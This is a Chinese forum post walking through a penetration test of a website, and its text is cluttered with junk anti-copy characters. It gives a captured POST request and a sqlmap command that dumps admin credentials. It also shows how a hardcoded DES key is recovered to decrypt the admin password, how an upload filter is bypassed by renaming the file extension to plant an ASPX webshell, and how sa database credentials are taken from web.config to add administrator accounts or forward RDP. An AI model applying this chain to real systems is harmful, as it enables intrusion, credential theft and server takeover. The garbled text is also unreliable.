# J9 R+ P# v$ B, M- L3 W/ N- J 注:各位同仁,今天晚上主要防止被限号来凑个数字,这篇文章本来是给一个机构做科普的,所以写的有点怎么说,反正土司的人看了会骂哈哈,大家凑合的看,文中哪怕有那么一点半点东西,能给大家带来启发,那么我这个文章就没白发,所以大佬们轻点喷哈哈,嘴下留情哈哈。 1、POST注入猜解网站管理员账号密码 通过awvs扫描发现存在注入,直接在avws下的Scans---target下点击你扫描的过目标如图:- G! \/ }( Z y2 p
: k) _1 _4 n8 M- U) S* \7 K
5 v8 I F# [& t) M G" `: k# w4 r8 u* y0 C
1 [) {1 ~$ j) j+ v9 R
6 s: ]% i& q" w$ A 然后点vulnerabilities,如图:5 ? A: H/ @- k# U
/ q7 S& [+ {2 {$ w- h
5 H7 N* z2 A# H3 a8 J9 Y# p) Z " [; y' z V% X. \. @
5 i9 P: \; B- N2 e4 N
L+ N) | }& e: S
点SQL injection会看到HTTPS REQUESTS,如图:) W2 ^2 I9 p) @8 B+ n2 l
1 Z% j5 d! u# i- N1 V# H2 O
d: L3 e# b% r* Q5 o1 H; X 7 I# A/ F8 C$ n; `4 Z0 l, v
* r D% y( P. l% i( \
; {; F1 S( Z3 C 获取到http的数据包,如下: POST /Product/ProductHandler.ashx HTTP/1.1 Host: www.test.cn Cache-Control: no-cache Accept: text/plain, /; q=0.01 Origin: http://www.test.cn User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://www.test.cn/ Accept-Language: en-us,en;q=0.5 X-Scanner: Netsparker Accept-Encoding: gzip, deflate Content-Length: 157 Content-Type: application/x-www-form-urlencoded; charset=UTF-83 N O& `! J# P
7 z: k$ K5 M# Q* W. U
2 Y# O5 O8 [" {$ m- C
Type=GetProductList&pageIndex=3&pageSize=5&productType=*&supplierType=1 把以上post包保存到sqlmap根目录下,保存为1.txt,注入参数提前用awvs已经识别,注入参数是productType,注入命令为: sqlmap.py -r 1.txt --level 5 --risk 3 -p productType --dbms=mssql -D cci -T Zy_user -C u_loginname,u_loginpassword –dump 此sqlmap命令的意思是读取数据库cci下Zy_user表的用户名密码列名,dump就是保存下来的意思,会保存在./sqlmap/output下,以excel表格的格式保存着下载下来的表的内容。 注入用户名密码加密值如图:5 b M4 w" ^) A0 ~
! d. ]% c9 G7 Z1 \* W
, h8 G# n) a \0 P! B _
4 x5 O7 J, A+ z4 e
; G9 {6 i% {% E* s; c
4 W3 J* ]# o. Q" J% C 2、通过对bin目录dll进行反编译解密管理员加密值登录后台 通过前面的sql注入可获取网站后台账号和密码加密值,为了更深入的测试网站后台是否存在其他漏洞,需要黑盒测试模拟黑客攻击进一步测试,故对网站目录bin目录下的dll进行反编译来获取加密密匙,最终成功解密密码。 把bin目录下的dll全部加载到Reflector中,然后通过跟踪常用用户密码相关的类函数,得出如下结果:4 t9 W& l9 I" p
) R3 T3 Y1 u1 j7 c8 u
% V% y$ n! i2 P 0 N" F$ D2 U9 p+ q" r' H
5 \# L# O# t! {8 q# r) \) \ T
+ n5 F3 N4 M. O
; c# {: T7 ~: X" w 4 K9 B) t) W0 q! A9 T0 T% i( D, i
& L% d2 d+ W" j
得知密钥是fkue且为des加密,接着定位encrypt类函数找出其解密方式如图:
+ s# O Y) H" ]2 n8 K
4 ^1 L9 d4 x' X+ c& h4 X$ r
8 A! \$ c! p# s% i4 p 7 C$ w$ @4 H% C" [/ C2 v
# Y9 A$ |; b8 u/ y! t8 A d. ?& G0 ^ Q$ ]8 `, A8 o9 R% d
解密方式是把fkue使用md5进行加密,然后取32位md5加密值的前8位作为加密密钥,如图:
" g; x) p3 [4 ]( S- |1 P4 G
. h2 n' [+ z+ I
, c0 O. `# w) _: G# M6 v 5 H# s& g& K. }4 K4 J
) U5 Y6 ~* T* _$ K# e2 j. L( U3 }) j
通过在线解密网站解密得知加密密钥就是:1110AF03。 前面sql注入步骤已经成功获取admin的加密值,如图:
" h0 B8 C5 Q! e! V; }
. ^2 S4 Q7 ?9 u1 x' a- w9 r
2 s1 W1 I3 h i5 v. e ; A, q! U2 |" O8 l' P
. Y1 ] \" L6 s& ^
" T6 J2 S p& L9 z6 A" W$ ^ 解密admin管理员密码如图:1 J5 [+ L( e9 q3 h# p
8 v( _* S. P: P5 c" |& y; p
7 D. B1 s x9 C! W' f6 X% c ! B& n6 t, x( a% b# B& X
8 v4 E5 _" n' T1 X& P8 b( b
7 a7 G7 y+ }1 o* E+ K/ C 然后用自己写了个解密工具,解密结果和在线网站一致 N' P: f. A( u; Y: |
# @! V- h6 o4 V- T8 |" h' O/ X, [5 K. v3 e
2 e- G6 Q( x; K, T" J" l8 u
6 u5 }# M7 [ C4 @
: R7 S( k' E0 ]2 a; ~( T% C 解密后的密码为:123mhg,./,登陆如图:
1 ^1 r: q" W& d, v( N) O/ @
4 Y% I4 N4 f& R
' R% d8 ?; \. D% d 3 S2 A% z. U7 U1 s0 x
9 P- Z: Q! j7 Y! ?: ~ h6 [4 _5 V* |0 K( I6 p; H3 W& h# f! F/ Z
3、后台上传绕过漏洞getwebshell如图: 登陆后台后,在添加信息处,会有上传图片的功能,随后使用burpsuite抓包如下图:
' j, D0 \; b! y1 o- H/ }
9 P& j) L7 I q1 S' O' g* z+ m$ A5 z5 `1 S" O+ N$ R" f# n
3 ?" B @1 f& u I2 K
: e( u. U- \6 u, g# X/ N. Q/ j5 c3 S
6 j/ O0 t4 |- T; `; t5 ?! V. y
* O* x$ H- W/ T- M! A8 w
2 ?3 r2 o1 W; T) y1 [
7 t5 S- V- ]. g( \ 绕过上传限制,只需要把包里的filename的1.jpg改为1.aspx,即可成功上传webshell,如下图:2 {4 J. R: g8 g& `. |3 X" b
5 A- t% S) X8 ]! R
9 L. ]! ~3 @2 T7 I5 x1 U! | 9 d* y* E% ?' k5 I3 C+ d
3 x$ O% m% r5 ?- y8 D0 o& ]$ M( a6 N- b; p+ X) t
访问webshell如下图:
8 U4 q7 K3 O* s8 a7 H - S# X/ }# N, d
) d% _$ }9 ]" |
! `$ x1 Y! ^, {. g0 [ 7 Y+ _" J' n, p9 l' f2 j
+ ~5 d% D/ S4 C1 O! E 4、前台任意上传漏洞getwebshell 在目标站前台有注册账号功能,注册成功后,同样在上传图片处可直接上传webshell,链接为http://www.test.cn/userRegister.aspx,登录如图:. j+ t# ?* R `& ~" [: @
, S- C+ \4 G" w3 I0 B# @$ a5 j) ~& T$ M! y% U* h( A: `" n
8 g4 P6 M; v7 ]) ~' Y 9 G. n, i# `) x7 f" G
/ o: [" o- T$ ?% r2 b6 @ 在上传证件或者头像的处可直接上传aspx 后缀的webshell,上传成功后,点右键-属性,可查看上传后的webshell路径为:http://www.test.cn/Admin/upload/demo.aspx 然后登录如图:
% C; [* p; g1 L8 d/ A' m6 |# g # e1 b( K N+ k& w# n, p
! g2 ?$ X' |2 O - l& e% n' s$ ]% U$ G6 ?& q
! l3 D7 z! e/ s/ J0 a& U
+ E. R q m- p9 R- J" N 通过查看网站路径下的web.config文件得到mssql数据库配置账号为sa的密码并且以windows身份认证配置的系统登录账号密码如图:5 K2 Q; O e; H
; t2 {9 `( U4 A5 \. ~$ ` |9 Q( B0 r
+ T$ a$ p! U! H, X# L2 ]
6 B( t' T R' j. l/ B 2 w# }0 m: p3 p9 Q. R
" s2 o ~+ H- h, o- r 可直接利用mssql sa权限执行系统命令添加管理员账号密码或者直接利用Windows登录密码webshell下利用lcx内网端口转发登陆3389。
: |- w8 Y5 {$ C$ i0 h4 f9 P; ^- O3 y
7 m7 ?6 O! f& ?4 ?% d& U, h9 l3 l I7 I- s2 n
总结:一套程序不应该只考虑其美观与功能强大,是要在满足安全的前提下再同时满足美观与功能。建议各个单位在系统上线之前,条件允许的情况下,首先进行白盒测试,其次进行黑盒测试,再次进行灰盒测试。如果通过白、黑、灰发现安全问题,那么就要再进行一轮这样的测试,直到系统难以被发现安全问题,然后再进行上线。特别是一些政府、企事业单位,数据面涉及基础人口等敏感数据,一旦遭到黑客攻击被泄露,给国家带来的损失是无法挽回的。好了以上就是今天分享的渗透内容,谢谢大家的收看!2 H! A& S" M1 F0 O- Z) I# s
# G1 S5 J8 O2 F* f8 `- I- _0 `, e
% Y4 L$ F9 M! V) h0 A2 R/ G
+ Q4 y9 v/ d0 x$ Y1 }5 j; r |